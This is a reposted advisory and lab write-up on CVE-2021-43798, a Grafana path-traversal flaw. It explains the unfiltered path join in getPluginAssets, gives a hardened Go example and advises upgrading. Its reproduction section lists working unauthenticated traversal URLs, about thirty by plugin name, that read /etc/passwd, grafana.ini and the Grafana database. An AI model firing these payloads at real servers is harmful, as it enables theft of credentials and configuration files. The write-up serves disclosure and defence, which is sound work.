CVE-2021-43798: Grafana Arbitrary File Read Vulnerability

Posted on 2022-2-20 11:13:24
Original link: CVE-2021-43798: Grafana Arbitrary File Read Vulnerability


0x01 Introduction
Grafana is a cross-platform, open-source data visualization web application platform. Once a user has configured the connected data sources, Grafana can render data charts and alerts in a web browser.

0x02 Vulnerability overview

ID: CVE-2021-43798
An unauthenticated attacker can exploit this vulnerability to read sensitive files from the server.

0x03 Affected versions

Grafana 8.0.0 - 8.3.0

0x04 Environment setup

docker pull grafana/grafana:8.2.6
docker run -p 3000:3000 grafana/grafana:8.2.6
Then browse to port 3000.

0x05 Reproduction

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

gettingstarted is a plugin ID that ships with a default Grafana installation; any other plugin ID works just as well.
Reading the Grafana configuration file:
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini

Reading the Grafana database:
/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db

Plugin list fuzzed by other researchers:
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md
  /public/plugins/alertGroups/../../../../../../../../etc/passwd
  /public/plugins/alertlist/../../../../../../../../etc/passwd
  /public/plugins/annolist/../../../../../../../../etc/passwd
  /public/plugins/barchart/../../../../../../../../etc/passwd
  /public/plugins/bargauge/../../../../../../../../etc/passwd
  /public/plugins/canvas/../../../../../../../../etc/passwd
  /public/plugins/dashlist/../../../../../../../../etc/passwd
  /public/plugins/debug/../../../../../../../../etc/passwd
  /public/plugins/gauge/../../../../../../../../etc/passwd
  /public/plugins/geomap/../../../../../../../../etc/passwd
  /public/plugins/gettingstarted/../../../../../../../../etc/passwd
  /public/plugins/graph/../../../../../../../../etc/passwd
  /public/plugins/heatmap/../../../../../../../../etc/passwd
  /public/plugins/histogram/../../../../../../../../etc/passwd
  /public/plugins/live/../../../../../../../../etc/passwd
  /public/plugins/logs/../../../../../../../../etc/passwd
  /public/plugins/news/../../../../../../../../etc/passwd
  /public/plugins/nodeGraph/../../../../../../../../etc/passwd
  /public/plugins/piechart/../../../../../../../../etc/passwd
  /public/plugins/pluginlist/../../../../../../../../etc/passwd
  /public/plugins/stat/../../../../../../../../etc/passwd
  /public/plugins/state-timeline/../../../../../../../../etc/passwd
  /public/plugins/status-history/../../../../../../../../etc/passwd
  /public/plugins/table/../../../../../../../../etc/passwd
  /public/plugins/table-old/../../../../../../../../etc/passwd
  /public/plugins/text/../../../../../../../../etc/passwd
  /public/plugins/timeseries/../../../../../../../../etc/passwd
  /public/plugins/welcome/../../../../../../../../etc/passwd
  /public/plugins/xychart/../../../../../../../../etc/passwd

0x06 Vulnerability analysis
The route enters here:

In the getPluginAssets function in plugins.go, after reading the user-supplied pluginId and confirming that the plugin exists, the code concatenates the plugin directory with the user-supplied path parameter. No filtering is applied to that parameter, and the resulting file is returned directly.

The pluginId can be seen here: open any plugin and capture the request, and the request path contains the pluginId. These plugins are installed by default, so in practice there is no need to log in to look them up.
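The following is an added illustration, not Grafana's code, of the pattern described above: a helper that joins the plugin directory with the request path without validation, beside a hardened helper that cleans the path and refuses anything that resolves outside the plugin directory. The plugin directory used in main is a hypothetical value.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrTraversal is returned when the requested asset resolves outside the plugin directory.
var ErrTraversal = errors.New("requested path escapes plugin directory")

// vulnerableAssetPath mirrors the flawed pattern: the user-controlled asset path is
// joined onto the plugin directory with no validation, so ".." segments walk out of it.
// Illustrative only; this is not Grafana's implementation.
func vulnerableAssetPath(pluginDir, requested string) string {
	return filepath.Join(pluginDir, requested)
}

// safeAssetPath resolves the requested asset inside pluginDir and rejects any result
// that does not remain within pluginDir after ".." segments have been collapsed.
func safeAssetPath(pluginDir, requested string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requested) // Join cleans the result, resolving ".."
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", err
	}
	// A relative path that starts with ".." points above the plugin directory.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return full, nil
}

func main() {
	dir := "/srv/grafana/plugins/gettingstarted" // hypothetical plugin directory
	for _, req := range []string{"module.js", "../../../../../../etc/passwd"} {
		fmt.Println("vulnerable join:", vulnerableAssetPath(dir, req))
		p, err := safeAssetPath(dir, req)
		fmt.Println("hardened join:  ", p, err)
	}
}
```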

0x07 Fix

Upgrade to the latest version:
https://github.com/grafana/grafana

References:
https://nvd.nist.gov/vuln/detail/CVE-2021-43798
https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md

